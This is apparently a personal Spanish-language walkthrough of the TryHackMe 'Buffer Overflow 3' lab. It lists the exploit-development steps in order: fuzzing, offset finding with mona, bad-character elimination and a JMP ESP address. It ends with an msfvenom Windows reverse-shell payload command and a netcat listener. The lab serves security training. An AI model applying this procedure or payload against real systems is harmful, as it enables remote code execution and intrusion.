
TryHackMe Buffer Overflow3
Linux
)
python3 fuzzer.py
)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100
)
Copiamos esto a payload en el exploit.py
Reiniciamos app
python3 exploit.py
!mona findmsp -distance 1700
)
Offset es 1274
Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de “BBBB”
)
!mona bytearray -b “\x00”
)
python3 bad_characters.py
Lo que sale del comando arriba lo ponemos en payload
)
!mona compare -f C:\mona\oscp\bytearray.bin -a
)
Los bad chars son los siguientes:
00 11 12 40 41 5f 60 b8 b9 ee ef
Donde dice ESP le damos click derecho y Follow in Dump
)
Quitamos el 11 del payload en el script
)
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
)
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40
Quitamos el x40 del payload en el script
)
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
)
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f
Quitamos el x5f del payload en el script
)
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
)
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8
)
Quitamos el xb8 del payload en el script
)
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
)
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee
)
Quitamos el xee del payload en el script
)
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
)
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee
!mona jmp -r esp -cpb “\x00\x11\x40\x5f\xb8\xee”
)
Agarramos el numero 62501203
cambiamos el rtn y iniciamos payload=” esto en exploit.py
)
msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b “\x00\x11\x40\x5f\xb8\xee” -f c
Agregamos a lo que sale en el comando anterior y ese valor es de payload en el exploit.py
padding = “\x90” * 16 nc -lvnp 4444
)